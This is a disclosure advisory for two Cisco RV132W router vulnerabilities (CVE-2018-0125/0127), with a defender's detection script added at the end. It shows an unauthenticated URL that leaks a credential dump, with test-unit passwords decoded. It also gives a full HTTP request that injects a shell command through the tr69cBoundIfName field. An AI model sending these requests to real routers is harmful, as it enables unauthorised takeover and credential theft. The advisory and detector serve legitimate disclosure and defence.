seebug | Root | SSV:97135
Feb 23, 2018 - 12:00 a.m.

Cisco RV132W Multiple Vulnerabilities(CVE-2018-0125/CVE-2018-0127)

EPSS: 0.53 (percentile: 97.6%)

Vulnerabilities Summary

The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8.

The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.”

The vulnerabilities found are:

  • Information Disclosure That Leads to Password Disclosure
  • Unauthenticated WAN Remote Code Execution

Credit

A security researcher from NHSC has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response

Cisco were informed of the vulnerabilities and released patches to address them: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x

CVE: CVE-2018-0125 / CVE-2018-0127

Vulnerabilities details

Information Disclosure that Leads to Password Disclosure

User-controlled input is not sufficiently filtered; an unauthenticated user can access the following page:

http://[TARGET_IP]/dumpmdm.cmd

The output includes the admin SSH password, base64-encoded (the sshpass element):

<AdminUserName>redalert</AdminUserName>
 <AdminPassword>61eac78956b08e9b7c499691eddbe2e2</AdminPassword>
 <AdminPasswordHash>(null)</AdminPasswordHash>
 <AdminCliEnable>TRUE</AdminCliEnable>
 <SupportUserName>support</SupportUserName>
 <SupportPassword>support</SupportPassword>
 <SupportPasswordHash>(null)</SupportPasswordHash>
 <SupportCliEnable>TRUE</SupportCliEnable>
 <UserUserName>user</UserUserName>
 <UserPassword>user</UserPassword>
 <UserPasswordHash>(null)</UserPasswordHash>
 <UserCliEnable>TRUE</UserCliEnable>
 <logintimeout>30</logintimeout>
 <SetAdminUser>TRUE</SetAdminUser>
 <SetGuestUser>FALSE</SetGuestUser>
 <EnableAdminUser>TRUE</EnableAdminUser>
 <EnableGuestUser>FALSE</EnableGuestUser>
 <GuestUserName>guest</GuestUserName>
 <GuestPassword>574ea313a3b02211d193d01606942111</GuestPassword>
 <GuestPasswordHash>(null)</GuestPasswordHash>
 <GuestCliEnable>TRUE</GuestCliEnable>
 <GuestUserIsInUse>FALSE</GuestUserIsInUse>
 <FirstLogin>TRUE</FirstLogin>
 <GuestLoginTimeout>30</GuestLoginTimeout>
 <loginchecked>0</loginchecked>
 <sshpass>cmVkYWxlcnQxMzIkAA==</sshpass>

Decoding: “cmVkYWxlcnQxMzIkAA==” base64-decodes to “redalert132$”, which is our test unit's password.

Unauthenticated WAN Remote Code Execution

User-controlled input is not sufficiently filtered; an unauthenticated user can access the following page:

http://[TARGET_IP]/tr69cfg.cgi

By sending a POST request with a modified tr69cBoundIfName= parameter, an unauthenticated user can execute arbitrary code on the victim's router:

POST /tr69cfg.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 627
Referer: http://192.168.1.1/tr69cfg.cgi
Connection: close
Upgrade-Insecure-Requests: 1
 
submit_button=Basic_config&tr69cEnable=1&tr69cInformEnable=1&ipvEnable=0&tr69cInformInterval=300&tr69cAcsURL=http%3A%2F%2F192.168.1.1&tr69cAcsUser=admin&tr69cAcsPwd=admin&tr69cConnReqUser=admin&tr69cConnReqPwd=admin&tr69cConnReqPort=7547&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0&tr69cAcsCert=&tr69cCpeCert=&downloadFileType=&tr69cBoundIfName=;COMMAND-TO-RUN;&tr69cBindInterface=ETH_WAN_R&tr69=on&ipv=on&inform=on&informInterval=300&httpCategory=http%3A%2F%2F&acsURL=192.168.1.1&acsUser=admin&acsPwd=admin&debug=on&FileType=on&connReqAuth=on&connReqUser=admin&connReqPwd=admin&connReqPort=7547&WANInterface=eth0.1
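
For defenders, one way to flag both request patterns described above in captured HTTP traffic. This is an added example, not part of the original advisory or any Cisco code; the interface-name allowlist, the function name inspect_request and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Assumption: a legitimate interface name contains only these characters
# (e.g. "eth0.1", "ETH_WAN_R"); anything else in tr69cBoundIfName is suspect.
SAFE_IFNAME = re.compile(r"[A-Za-z0-9_.:-]{0,32}")

def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (head, blank line, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return ["malformed request line"]
    url = urlsplit(parts[1])
    path = unquote(url.path).lower()
    findings = []
    if path == "/dumpmdm.cmd":
        findings.append("request for /dumpmdm.cmd (configuration dump with credentials)")
    if path == "/tr69cfg.cgi":
        # Check form fields from both the query string and the body.
        for pair in (url.query + "&" + body.strip()).split("&"):
            name, _, value = pair.partition("=")
            if unquote_plus(name) != "tr69cBoundIfName":
                continue
            value = unquote_plus(value)
            if not SAFE_IFNAME.fullmatch(value):
                findings.append("tr69cBoundIfName is not a plain interface name: %r" % value)
    return findings

# Constructed sample requests (not captured traffic).
BENIGN = ("POST /tr69cfg.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"
          "tr69cEnable=1&tr69cBoundIfName=eth0.1&tr69cBindInterface=ETH_WAN_R")
INJECTED = ("POST /tr69cfg.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"
            "tr69cEnable=1&tr69cBoundIfName=%3BCOMMAND-TO-RUN%3B&tr69cBindInterface=ETH_WAN_R")
DUMP = "GET /dumpmdm.cmd HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("injected", INJECTED), ("dump", DUMP)):
        print(label, inspect_request(req))
```

Since neither page requires authentication on the affected firmware, any hit from a WAN-side source address is worth triage even when the request is otherwise well formed.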